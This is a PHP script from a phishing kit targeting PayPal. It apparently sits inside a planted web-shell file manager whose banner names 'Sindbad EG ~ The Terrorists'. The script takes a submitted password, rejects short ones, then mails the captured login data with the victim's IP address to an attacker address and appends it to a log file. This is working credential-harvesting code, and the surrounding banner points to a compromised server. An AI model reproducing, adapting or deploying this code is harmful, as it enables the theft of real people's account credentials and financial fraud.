Sindbad~EG File Manager
<?php
session_start();
sleep(3);
include("mail.php");
$PW = $_POST['Spassword'];
if(strlen($PW)<6){
echo "Y2h@lY2t5b@@@vcmQ=";
}else{
include("functionsend.php");
$head = "MIME-Version: 1.0" . "\r\n";
$head .= "Content-type:text/html;charset=UTF-8" . "\r\n";
$head .= "From: $from\r\n";
$subject = "New PayPal Login Form : ".getenv("REMOTE_ADDR");
@mail($to,$subject,functionsend::Login(),$head);
$f = fopen($save, "a+");
fwrite($f, functionsend::Login());
fclose($f);
}
?>
Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists